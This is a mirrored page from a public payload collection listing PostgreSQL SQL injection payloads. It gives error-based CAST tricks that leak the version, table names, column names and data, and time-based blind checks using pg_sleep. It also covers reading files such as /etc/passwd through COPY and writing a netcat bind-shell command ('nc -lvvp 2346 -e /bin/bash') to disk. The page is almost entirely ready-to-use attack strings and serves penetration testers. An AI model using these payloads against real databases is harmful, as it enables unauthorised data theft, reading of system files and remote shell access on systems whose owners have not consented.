mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
49 lines
No EOL
1.2 KiB
Markdown
49 lines
No EOL
1.2 KiB
Markdown
# POSTGRESQL
|
||
|
||
## PostgreSQL Comments
|
||
|
||
```sql
|
||
--
|
||
/**/
|
||
```
|
||
|
||
## PostgreSQL Error Based - Basic
|
||
|
||
```sql
|
||
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
||
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
||
```
|
||
|
||
## PostgreSQL Time Based
|
||
|
||
```sql
|
||
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
|
||
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
||
```
|
||
|
||
## PostgreSQL File Read
|
||
|
||
```sql
|
||
select pg_read_file('PG_VERSION', 0, 200);
|
||
```
|
||
|
||
```sql
|
||
CREATE TABLE temp(t TEXT);
|
||
COPY temp FROM '/etc/passwd';
|
||
SELECT * FROM temp limit 1 offset 0;
|
||
```
|
||
|
||
## PostgreSQL File Write
|
||
|
||
```sql
|
||
CREATE TABLE pentestlab (t TEXT);
|
||
INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
|
||
SELECT * FROM pentestlab;
|
||
COPY pentestlab(t) TO '/tmp/pentestlab';
|
||
```
|
||
|
||
## Thanks to
|
||
|
||
* [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) |